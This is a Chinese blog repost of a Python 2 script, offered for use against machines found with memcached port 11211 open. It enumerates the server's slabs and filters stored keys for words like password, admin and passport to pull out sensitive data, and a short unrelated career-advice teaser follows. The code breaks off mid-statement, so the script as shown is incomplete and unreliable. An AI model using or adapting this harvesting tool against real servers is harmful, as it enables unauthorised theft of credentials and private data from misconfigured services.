遍历Memcached且过滤关键信息的小脚本

经常碰倒对外开了memcached端口也就是11211的机器.而通常这里面会有一些很有意思的信息.

所以这里随手写了个小脚本.发wooyun存个档。各位用之前请记得easy_install python-memcached或者pip install python-memcached一下。

#!/usr/bin/env python
#coding=utf-8
#Author: wofeiwo#80sec.com
#Just filter sensitive information form a memcache server

import memcache
import re,sys
from pprint import pprint

MAX_NUM   = 100
RE_STRING = "user|account|config|password|passwd|admin|manage|member|passport" # 这里选择你所需要过滤的关键词

def isImportant(word):
    pattern = re.compile(RE_STRING, re.I)
    return pattern.search(word)

def main(args):
    if len(args) != 2:
        print "Usage: %s " % args[0]
        sys.exit(-1)
    elif args[1] in ["-h", "--help", "/?"]:
        print "Usage: %s " % args[0]
        sys.exit(-1)

    mc = memcache.Client([args[1]])

    slabs = {}
    if not mc.get_slabs():
        print "[-] Error: Server not correct or empty items."
        print "[-] Exiting.."
        sys.exit(-2)

    for k,v in mc.get_slabs()[0][1].items():
        slabs[k] = v["number"]

    for k,v in slabs.items():
        if v 

	


	摘自：http://zone.wooyun.org/content/2137 

    

文章来源于lcx.cc:遍历Memcached且过滤关键信息的小脚本

相关推荐: 天时地利人和

最近收到两个问题，一个是问如何做职业规划的，对前途比较迷茫，一个是自己想了个idea，问我是不是靠谱。 一般对于这类回答我是不回复的，因为以前的文章里已经讲过很多观点了。但今天刚好翻出来一篇我一年前写了一半的博客文章，因为未写完所以也就未曾公开。今天就把此文写…